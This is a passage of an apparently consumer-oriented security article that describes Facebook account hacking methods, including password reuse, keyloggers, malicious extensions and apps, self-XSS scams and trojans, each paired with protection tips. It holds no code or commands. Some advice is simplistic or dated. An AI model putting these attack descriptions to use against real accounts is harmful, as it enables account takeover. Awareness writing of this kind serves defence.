3 Plain Password Grabbing

insecure-plain-password-grabbing
This is another common method used to steal Facebook user's password. Most people are unaware of this method, but traditional hackers use this method to hack user accounts.

How does Plain Password Grabbing works? 

In this method, the Facebook hacker targets a particularly low-quality website, where the victim is a member and hacks their database to get the stored plain username & password of victim.

How could the hacker/attacker get access to Facebook?

Many of us use the same password for FB and also for some poor xyz.com. So, it is easy for a hacker to get your password through the low-quality poorxyz.com.

In another scenario, the hacker/attacker creates a website with the intention of getting victim's password, so when the victim registers his/her account using email and creates a password, those details will get stored in the database of the hacker/attacker. Thus hacker gets access to victim's account.

Common people, who use same email and password for these kinds of low-quality websites, may end up losing their Facebook account.

How can you protect yourself from Facebook Plain Password Grabbing? 

You should never trust the third party low-quality websites. Even passwords of popular websites, like LinkedIn, are insecure and vulnerable to hacking. So, never and ever trust the third party low-quality websites.


Most of the website developers are storing plain passwords in their database without even thinking about encryption or security. This makes Facebook hackers' job easy since the password is in plain text format.

Best way to prevent this method is to have a unique password at least for websites that you really trust. Don't use your FB password for any other website/portal, so your password will be safe .


4 Key Logger

Facebook-Hacking-Key-Loggers
A keylogger is a software tool used to record keystrokes on a computer or mobile device. This, in turn, records everything you type using your keyboard and store it for use. Generally, keyloggers are installed as application software in operating systems to track keystrokes, but there are hardware keyloggers as well.

Hardware keyloggers also are known as physical keyloggers attached to a computer in a USB port records everything before it sends the keyboard data to the computer. There are various mobile keyloggers, that perform the same action on various operating systems.

How Key Logging works?

All keyloggers run in the background (except trial versions) and won't be viewable to users until you know the keylogger password and shortcut used to view it. It will record all the keys pressed and give you a detailed report of when and what keys are used for what application – Simply, a clean report to identify passwords.

Anyone who is reading the keylogger logs is able to see the Facebook password or any passwords and sensitive information typed, like credit cards, bank username, password etc. Whenever you log in to a public computer, there are chances to lose your Facebook password to someone else.

Hardware keyloggers are identifiable in case of your personal computer but are hard in case of public computers.

In another scenario, your friend/colleague/neighbor could ask you to log in using their computer as a help. If their intention is to get your password, then you are most likely to lose your Facebook account to the hacker.

Nowadays, many people are using mobile keyloggers. It enables to track the keypad of mobile. So, any sensitive information typed on the mobile keypad is vulnerable to hacking.

How can you protect yourself from Key Logging?

You need not be afraid of keyloggers when you use your personal computer since you are the only one who is going to access it. But, whenever you use any public computer or your friend's computer, you should not trust it.

I always suggest my friends use On-Screen Keyboard whenever they are in need to type a password. Also, please make sure that nobody is checking your screen when you type your password because your screen would expose what you had typed. In windows, there is an inbuilt tool called On-Screen Keyboard that helps us to select keys using the mouse.

You can open OSK by using the Run dialog box. Winkey + R to open Run dialog box, type OSK and then press Enter. Nowadays, many banking portals provide a screen keyboard in the browser itself. So, please make use of it whenever you are surfing on public computers. On-Screen Keyboard helps even when hardware keyloggers are installed.

Never use third-party mobile keypad apps unless you really trust the publisher because the app may track all of your keystrokes and send it to the publisher.


5 Browser Extension Hacker

This method doesn't let the Facebook hacker/attacker gain complete access to your Facebook account, however, gives some power to control your account indirectly. I've seen multiple Google Chrome and Firefox add-ons, which secretly perform actions, like following a person, like a page on behalf of your Facebook profile, etc.

How Browser extension hack works?

When you visit some malicious websites or web pages, you will be prompted to install a browser add-on. Once you install the add-on, it will perform all the tasks described by the hacker or attacker who created it. Some primary actions are posting status updates on your wall, liking an FB page, following a person, adding you to some Facebook groups, inviting your friends to like a page, or join a Facebook group etc. You may not know these things happening on your FB account until you check your Facebook activity log periodically.

How can you prevent browser extension Facebook hack?

You should monitor your activities using Activity Log. You must not trust any third party websites prompting you to add a browser extension. Install add-on only from the browser store, that too only from trusted publishers. Why should you risk your account if you don't know the publisher or intention of the add-on? Therefore, always stay away from these malicious browser extensions.


6 Malicious Application Hack

Always remember that all the apps you use on Facebook are owned by third-party publishers and not by Facebook. Of course, there are a few exceptions like Instagram. A malicious application, which is requesting your permission, will do almost all kind of spam stuff on your Facebook profile.

How malicious application hack works?

Whenever you find Login using the Facebook option on any website, you should come to know that it is a third party Facebook application not owned by Facebook. When you click Login using Facebook, you will be shown a permission dialog box with the requested permission details. Once you click okay button, the requested personal details can be accessed from FB or the requested actions can be performed in your FB account on your behalf.

What could a third party application do on your Facebook account?

  • Post photos and status update
  • Share link to your timeline or to any group you belong
  • Manage your page
  • Post on behalf of you on the Facebook pages you own
  • Access your personal information
  • Access your photos including "Only me" privacy photos; sometimes they can further access your mobile photos using a Facebook vulnerability like the one I found (Don't worry, it's completely fixed now 😉 ).

These are just examples of what can be done. What if the application you are using is malicious? It could spam your Facebook account with a bunch of worthless contents.

How can you prevent yourself from malicious application hack?

You should always beware of what permissions you give to a Facebook application even though FB is reviewing application's permission requests. Don't give permission to an application if you don't trust the website or application.

Facebook-third-party-application-dialog-box
FB Application Permission Dialog Box

You can edit the information that you give to an application in the permission dialog box (snapshot given above). Also, you should review the applications that have access to your Facebook account here if you think you had given access to malicious applications.


7 Facebook Account Hacker Software 

You might have seen or downloaded many Facebook account hacker software, but none of them could truly hack Facebook password. Hacking your Facebook password instead of the target user is what it actually does.

How does Facebook account hacker software work?

People who try to hack Facebook account usually download software that is available on various websites. The software will collect the victim's password (the one who downloaded this software) as soon as it is opened or installed. Some software prompt you to enter Facebook username and password. They will store your password in their database collection of passwords. Few other software gain administrative privilege from you to install background keylogger to get your keystrokes including the Facebook password.

How can you prevent yourself from Facebook hacking software?

Don't trust Facebook hacking software. There is no real hacking software available on the Internet as I had said earlier.


8 Malicious Mobile Application 

There are a lot of mobile applications that secretly steal Facebook access token from your mobile device. Facebook mobile app functions through API, where access-token stored in your mobile's internal memory is used for authentication.  It is more like your username and password. So, if someone steals your access-token, then he/she is likely to have full access to your Facebook account.

How malicious mobile application software works?

Facebook Application Interface do not require username or password every time to get user data. It just needs secret access-token to retrieve user's data. Facebook mobile app stores the access token in mobile's memory. The app's part of the memory is accessible only to the respective application. Mobile apps that have administrative privilege can access other app's data. For example, gaining admin privilege in a rooted android phone could allow an application to steal your access token. A hacker can do a lot of malicious things if he/she gets your access token.

How can you prevent yourself from malicious mobile applications?

  • Install mobile apps only from trusted publishers.
  • Don't root your mobile device.
  • Logout Facebook from your mobile device frequently to get your access token expired.
  • Change your Facebook password frequently.

9 Browser Vulnerabilities 

browser-vulnerabilities-fb-facebook-hack
Browser Vulnerabilities are security bugs, which exist in older versions of mobile and desktop browsers.

How does browser vulnerabilities work on Facebook hacking?

Most browser vulnerabilities are exploited through an older version of the browser since all the zero days are patched by browser vendor once it is reported by researchers around the world. For example, Browser Same Origin Policy Vulnerability could allow a hacker/attacker to read the response of any Page like facebook.com and could be able to perform any action on your Facebook account since they are able to read the response by accessing the Facebook origin. Android Chrome SOP bypass by Rafay Baloch is one such vulnerability that is affecting Android web-view in Android < 4.4.

How can you prevent yourself from browser vulnerabilities?

You should always update your browser and operating system once there is an update available. Keeping an older version always has many risk factors involved.

Self XSS is also known as Self Cross Site Scripting. XSS is basically a web security vulnerability, which enables hackers to inject scripts into web pages used by other users. What is self XSS then? Self XSS is a kind of social engineering attack, where a victim accidentally executes a script, thus exploiting it to the hacker.

How does self XSS scam work?

In this method, hacker promises to help you hack somebody else's FB account. Instead of giving you access to someone else's account, the hacker tricks you into running malicious Javascript in your browser console that gives a hacker the ability to manipulate your account. Facebook hackers use this technique to add you in groups, add your friends to the group, post on your wall, add your friends in comments etc.

How can you prevent yourself from self XSS?

Self XSS is something that you let hackers to hack your account. So never and ever copy & paste the code given by someone in your browser, otherwise, you will get your Facebook account hacked.


11 Trojan Horses 

Trojan Horse is a malicious program, which is used to spy and control a computer by misleading users of its true intent. Malware Trojan can also be called as Remote Key Logger since it records keystrokes of all the applications of our computer and sends it to the hacker online.

How do Trojan Horses work?

software you think legit might be a trojan. A PDF you don't suspect might contain a trojan. An AVI media file given by someone might be a trojan. The Trojan horse runs in the background process, collects information and send it to the hacker. Trojan Horse can be sent in any form through any medium, like pen drive, iPod, website, or email. In our topic, Trojan records FB password that you have typed in your browser and sends it to the Facebook hacker using the Internet.

How can you prevent yourself from Trojan?

  • Do not
    • install programs from unknown online sources
    • play media files received from an unknown source
    • open any kind of files downloaded from untrusted sources
    • insert pen drive from any suspicious people.
  • Do have an updated anti-virus software installed on your computer.

Keeping your anti-virus software up to date does not guarantee you to stay safe from hacking. Basically, an anti-virus software is a collection of detected malware and viruses. Its job is to compare each and every file with the database of viruses. There are many numbers of software, which enable us to create undetectable Trojans. But, it is very unlikely to target a common man with undetectable Trojanware. So, keeping an antivirus program up to date is protective to large extent. Don't forget to update your anti-virus software once an update is available.


12 FB Zero Day

Zero Day is a security vulnerability that is unknown to the respective software vendor. In our context, undiscovered Facebook vulnerabilities are called FB Zero Day.

How does Zero Day hacking work?

FB Zero Day vulnerabilities are very rare since Facebook has a bug bounty program, where security researchers around the world participate and report zero-day vulnerabilities. Zero-day is basically a security loophole that is unknown to the software vendor.

There are two types of people who find Zero Day vulnerabilities. The first case is Security Researchers and Bug hunters, who make a responsible disclosure about the vulnerability to the software vendor; FB in our context. Another case falls on the evil side. Blackhat hackers who find Zero Day vulnerabilities don't disclose it to Facebook and they will use it for their personal benefit of hacking.

@EVERYTHING NT

Related word